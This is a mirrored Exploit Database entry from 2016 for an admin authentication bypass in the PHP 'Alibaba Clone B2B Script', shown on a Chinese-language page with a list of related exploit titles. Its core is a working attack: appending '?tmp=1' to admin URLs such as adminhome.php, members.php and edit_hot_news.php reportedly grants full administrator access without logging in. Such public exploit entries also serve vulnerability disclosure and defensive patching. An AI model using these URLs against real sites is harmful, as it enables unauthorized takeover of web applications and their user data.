Alibaba Clone B2B Script – Admin Authentication Bypass

Exploit Database
14 阅读

作者： Meisam Monsef

日期： 2016-05-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39759/

# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Date: 2016-05-03
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions

Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1

For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1

or add a new news :
http://server/admin/hot_news_menu.php?tmp=1

or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1

last Exploits
Alibaba Clone B2B Script – Admin Authentication Bypass的更多信息

OpenText Documentum Content Server – Privilege Escalation：
Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 – ‘kw.dll’ HTML Injection：
Madness Pro 1.14 – Persistent Cross-Site Scripting：
DomainMod 4.09.03 – ‘oid’ Cross-Site Scripting：
Aflam Online 1.0 – ‘index.php’ SQL Injection：
Dell OpenManage Server Administrator 8.3 – XML External Entity：
WordPress Plugin Ads Pro < 3.4 - Cross-Site Scripting / SQL Injection：
Renista CMS – SQL Injection：